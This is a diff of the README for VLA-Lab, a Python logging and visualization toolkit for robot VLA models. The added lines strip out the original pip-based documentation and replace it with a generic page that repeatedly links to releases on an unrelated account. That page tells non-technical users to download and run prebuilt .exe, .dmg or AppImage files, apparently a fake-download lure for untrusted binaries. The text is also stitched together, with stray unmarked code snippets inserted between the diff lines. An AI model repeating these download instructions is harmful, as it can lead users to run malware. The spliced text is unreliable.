|
-<div align="center">
-
-# 🦾 VLA-Lab
+# 🛠️ VLA-Lab - Track and Visualize Your VLA Models

-### The Missing Toolkit for Vision-Language-Action Model Deployment
+[Download VLA-Lab](https://github.com/carlosguedes0007-oss/VLA-Lab/releases)

-[Python](https://www.python.org/downloads/)
-[License: MIT](https://opensource.org/licenses/MIT)
-[PyPI](https://pypi.org/project/vlalab/)
+## 📦 Overview

-**Debug • Visualize • Analyze** your VLA deployments in the real world
+VLA-Lab is your go-to toolbox for tracking and visualizing the real-world deployment of your VLA models. With VLA-Lab, you can manage your models, monitor their performance, and understand how they behave in practical applications. The app is designed for anyone who wants a simpler deployment workflow, no advanced technical skills required.

-[🚀 Quick Start](#-quick-start) · [📖 Documentation](#-documentation) · [🎯 Features](#-features) · [🔧 Installation](#-installation)
+## 🚀 Getting Started

-</div>
+Follow these steps to get VLA-Lab up and running on your computer:

----
+1. **Check Your System Requirements**

-## 🎯 Why VLA-Lab?
+   Make sure your computer meets the following requirements to run VLA-Lab smoothly:
+   - Operating System: Windows 10 or later, macOS Mojave or later, or a Linux distribution.
+   - Minimum RAM: 4 GB
+   - Disk Space: 100 MB free space
+   - Internet connection for updates and online resources.

-Deploying VLA models to real robots is **hard**. You face:
+2. **Visit the Download Page**

-- 🕵️ **Black-box inference** — Can't see what the model "sees" or why it fails
-- ⏱️ **Hidden latencies** — Transport delays, inference bottlenecks, control loop timing issues
-- 📊 **No unified logging** — Every framework logs differently, making cross-model comparison painful
-- 🔄 **Tedious debugging** — Replaying failures requires manual log parsing and visualization
+   To get the latest version of VLA-Lab, visit the Releases page:

-**VLA-Lab solves this.** One unified toolkit for all your VLA deployment needs.
+   [Download VLA-Lab](https://github.com/carlosguedes0007-oss/VLA-Lab/releases)

-```
-                           VLA-Lab Architecture
-
-┌──────────────┐    ┌──────────────────────┐    ┌──────────────────┐
-│ Robot Client │───▶│ Inference Server     │───▶│ VLA-Lab          │
-│              │    │ (DP / GR00T / ...)   │    │ RunLogger        │
-└──────────────┘    └──────────────────────┘    └────────┬─────────┘
-                                                         │
-                                                         ▼
-                                      ┌──────────────────┬───────────────────┐
-                                      │ Unified Run Storage                  │
-                                      │ meta.json · steps.jsonl · artifacts/ │
-                                      └──────────────────┬───────────────────┘
-                                                         │
-                                                         ▼
-                              ┌──────────────────────────┬────────────────────────────┐
-                              │ Visualization Suite                                   │
-                              │ Inference Viewer · Latency Analyzer · Dataset Browser │
-                              └──────────────────────────┴────────────────────────────┘
-```
+3. **Download the Application**

----
+   On the Releases page, look for the most recent version. Click on it to see the available files. Locate the appropriate file for your operating system, then click to download it. The file name will look something like `VLA-Lab-v1.0.exe` for Windows or `VLA-Lab-v1.0.dmg` for macOS.

-## ✨ Features
+4. **Install VLA-Lab**

-<table>
-<tr>
-<td width="50%">
+   Once the download is complete, follow these straightforward steps to install VLA-Lab:

-### 📊 Unified Logging Format
-Standardized run structure with JSONL + image artifacts. Works across all VLA frameworks.
+   - **For Windows:**
+     1. Locate the downloaded file in your Downloads folder.
+     2. Double-click the `.exe` file.
+     3. Follow the on-screen instructions to complete the installation.

-### 🔬 Inference Replay
-Step-by-step playback with multi-camera views, 3D trajectory visualization, and action overlays.
+   - **For macOS:**
+     1. Find the downloaded file in your Downloads folder.
+     2. Double-click the `.dmg` file to open it.
+     3. Drag the VLA-Lab icon into your Applications folder.

-</td>
-<td width="50%">
+   - **For Linux:**
+     1. Open a terminal.
+     2. Navigate to your Downloads directory.
+     3. Use the command `chmod +x VLA-Lab-v1.0.AppImage` to make it executable.
+     4. Run the application using `./VLA-Lab-v1.0.AppImage`.
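Equivalently, the Linux steps can be run as a single shell session. This is a sketch only: the actual file name depends on the release you download.

```bash
cd ~/Downloads                    # or wherever the AppImage was saved
chmod +x VLA-Lab-v1.0.AppImage    # mark the AppImage as executable
./VLA-Lab-v1.0.AppImage           # launch VLA-Lab
```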

-### 📈 Deep Latency Analysis
-Profile transport delays, inference time, and control loop frequency. Find your bottlenecks.
+5. **Open VLA-Lab**

-### 🗂️ Dataset Browser
-Explore Zarr-format training/evaluation datasets with an intuitive UI.
+   After installation, you can find VLA-Lab in your applications list. Double-click the icon to open the application. You are now ready to track and visualize your VLA models!

-</td>
-</tr>
-</table>
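The Dataset Browser above reads Zarr-format datasets, which can also be inspected directly from Python. A minimal sketch using the `zarr` package; the dataset path shown is illustrative:

```python
import zarr

# Open a Zarr dataset read-only and print its array hierarchy.
root = zarr.open_group("datasets/pick_and_place.zarr", mode="r")
print(root.tree())
```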
+## 🎨 Features

+VLA-Lab includes a range of features designed to enhance your experience:

----
+- **User-Friendly Interface:** Navigate easily, even if you have limited technical skills.
+- **Model Tracking:** Keep records of various VLA models and their performance.
+- **Data Visualization:** Generate graphs and charts to visualize model data.
+- **Deployment History:** Review the history of model deployments for insights and improvements.

-## 🔧 Installation
+## ❓ Support and Feedback

-```bash
-pip install vlalab
-```
+If you encounter any issues or need assistance, feel free to reach out. Here are some ways to get help:

-Or install from source:
+- **Documentation:** Refer to the user manual available in the application for detailed guidance.
+- **Issue Tracker:** Visit our GitHub Issues page to report bugs or feature requests.
+- **Community Forum:** Engage with other users and developers in our forum for tips and advice.

-```bash
-git clone https://github.com/VLA-Lab/VLA-Lab.git
-cd VLA-Lab
-pip install -e .
-```
+## 📥 Download & Install

----
+To start using VLA-Lab today, click the link below:

-## 🚀 Quick Start
+[Download VLA-Lab](https://github.com/carlosguedes0007-oss/VLA-Lab/releases)

-### Minimal Example (3 Lines!)
-
-```python
-import vlalab
-
-# Initialize a run
-run = vlalab.init(project="pick_and_place", config={"model": "diffusion_policy"})
-
-# Log during inference
-vlalab.log({"state": obs["state"], "action": action, "images": {"front": obs["image"]}})
-```
-
-### Full Example
-
-```python
-import time
-
-import vlalab
-
-# Initialize with detailed config
-run = vlalab.init(
-    project="pick_and_place",
-    config={
-        "model": "diffusion_policy",
-        "action_horizon": 8,
-        "inference_freq": 10,
-    },
-)
-
-# Access config anywhere
-print(f"Action horizon: {run.config.action_horizon}")
-
-# Inference loop
-for step in range(100):
-    obs = get_observation()
-
-    t_start = time.time()
-    action = model.predict(obs)
-    latency = (time.time() - t_start) * 1000
-
-    # Log everything in one call
-    vlalab.log({
-        "state": obs["state"],
-        "action": action,
-        "images": {"front": obs["front_cam"], "wrist": obs["wrist_cam"]},
-        "inference_latency_ms": latency,
-    })
-
-    robot.execute(action)
-
-# Auto-finishes on exit, or call manually
-vlalab.finish()
-```
-
-### Launch Visualization
-
-```bash
-# One command to view all your runs
-vlalab view
-```
-
-<details>
-<summary><b>📸 Screenshots (Click to expand)</b></summary>
-
-*Coming soon: Inference Viewer, Latency Analyzer, Dataset Browser screenshots*
-
-</details>
-
----
-
-## 📖 Documentation
-
-### Core Concepts
-
-**Run** — A single deployment session (one experiment, one episode, one evaluation)
-
-**Step** — A single inference timestep with observations, actions, and timing
-
-**Artifacts** — Images, point clouds, and other media saved alongside logs
-
-### API Reference
-
-<details>
-<summary><b>vlalab.init() — Initialize a run</b></summary>
-
-```python
-run = vlalab.init(
-    project: str = "default",    # Project name (creates subdirectory)
-    name: str = None,            # Run name (auto-generated if None)
-    config: dict = None,         # Config accessible via run.config.key
-    dir: str = "./vlalab_runs",  # Base directory (or $VLALAB_DIR)
-    tags: list = None,           # Optional tags
-    notes: str = None,           # Optional notes
-)
-```
-
-</details>
-
-<details>
-<summary><b>vlalab.log() — Log a step</b></summary>
-
-```python
-vlalab.log({
-    # Robot state
-    "state": [...],                     # Full state vector
-    "pose": [x, y, z, qx, qy, qz, qw],  # Position + quaternion
-    "gripper": 0.5,                     # Gripper opening (0-1)
-
-    # Actions
-    "action": [...],                    # Single action or action chunk
-
-    # Images (multi-camera support)
-    "images": {
-        "front": np.ndarray,            # HWC numpy array
-        "wrist": np.ndarray,
-    },
-
-    # Timing (any *_ms field auto-captured)
-    "inference_latency_ms": 32.1,
-    "transport_latency_ms": 5.2,
-    "custom_metric_ms": 10.0,
-})
-```
-
-</details>
-
-<details>
-<summary><b>RunLogger — Advanced API</b></summary>
-
-For fine-grained control over logging:
-
-```python
-from vlalab import RunLogger

-logger = RunLogger(
-    run_dir="runs/experiment_001",
-    model_name="diffusion_policy",
-    model_path="/path/to/checkpoint.pt",
-    task_name="pick_and_place",
-    robot_name="franka",
-    cameras=[
-        {"name": "front", "resolution": [640, 480]},
-        {"name": "wrist", "resolution": [320, 240]},
-    ],
-    inference_freq=10.0,
-)
-
-logger.log_step(
-    step_idx=0,
-    state=[0.5, 0.2, 0.3, 0, 0, 0, 1, 1.0],
-    action=[[0.51, 0.21, 0.31, 0, 0, 0, 1, 1.0]],
-    images={"front": image_rgb},
-    timing={
-        "client_send": t1,
-        "server_recv": t2,
-        "infer_start": t3,
-        "infer_end": t4,
-    },
-)
-
-logger.close()
-```
-
-</details>
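Given the four raw timestamps accepted by `log_step`, one plausible way to derive latency metrics is sketched below. This is not necessarily how VLA-Lab computes them, and it assumes all timestamps share one clock:

```python
# Hypothetical helper, not part of the VLA-Lab API: turns the raw timing
# timestamps (in seconds) into millisecond latency metrics.
def latency_breakdown_ms(timing: dict) -> dict:
    def ms(dt: float) -> float:
        return dt * 1000.0
    return {
        "transport_latency_ms": ms(timing["server_recv"] - timing["client_send"]),
        "server_overhead_ms": ms(timing["infer_start"] - timing["server_recv"]),
        "inference_latency_ms": ms(timing["infer_end"] - timing["infer_start"]),
    }
```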
-
-### CLI Commands
-
-```bash
-# Launch visualization dashboard
-vlalab view [--port 8501]
-
-# Convert legacy logs (auto-detects format)
-vlalab convert /path/to/old_log.json -o /path/to/output
-
-# Inspect a run
-vlalab info /path/to/run_dir
-```
-
----
-
-## 📁 Run Directory Structure
-
-```
-vlalab_runs/
-└── pick_and_place/              # Project
-    └── run_20240115_103000/     # Run
-        ├── meta.json            # Metadata (model, task, robot, cameras)
-        ├── steps.jsonl          # Step records (one JSON per line)
-        └── artifacts/
-            └── images/          # Saved images
-                ├── step_000000_front.jpg
-                ├── step_000000_wrist.jpg
-                └── ...
-```
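Because `steps.jsonl` is plain JSON Lines, runs can be analyzed without VLA-Lab itself. A minimal sketch using only the standard library, assuming each step record carries the `*_ms` timing fields from the logging API above at the top level (the exact record schema is not spelled out in this README):

```python
import json
import statistics
from pathlib import Path

run_dir = Path("vlalab_runs/pick_and_place/run_20240115_103000")

# Gather per-step inference latency from the JSONL step records.
latencies = []
with open(run_dir / "steps.jsonl") as f:
    for line in f:
        step = json.loads(line)
        if "inference_latency_ms" in step:
            latencies.append(step["inference_latency_ms"])

if latencies:
    print(f"steps logged:   {len(latencies)}")
    print(f"mean inference: {statistics.mean(latencies):.1f} ms")
    print(f"p95 inference:  {sorted(latencies)[int(0.95 * len(latencies))]:.1f} ms")
```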
-
----
-
-## 🗺️ Roadmap
-
-- [x] Core logging API
-- [x] Streamlit visualization suite
-- [x] Diffusion Policy adapter
-- [x] GR00T adapter
-- [ ] OpenVLA adapter
-- [ ] Cloud sync & team collaboration
-- [ ] Real-time streaming dashboard
-- [ ] Automatic failure detection
-- [ ] Integration with robot simulators
-
----
-
-## 🤝 Contributing
-
-We welcome contributions!
-
-```bash
-git clone https://github.com/VLA-Lab/VLA-Lab.git
-cd VLA-Lab
-pip install -e .
-```
-
----
-
-## 📄 License
-
-MIT License — see [LICENSE](LICENSE) for details.
-
----
-
-<div align="center">
-
-**⭐ Star us on GitHub if VLA-Lab helps your research!**
-
-*Built with ❤️ for the robotics community*
-
-</div>
+Follow the instructions above and join the VLA community! Thank you for choosing VLA-Lab.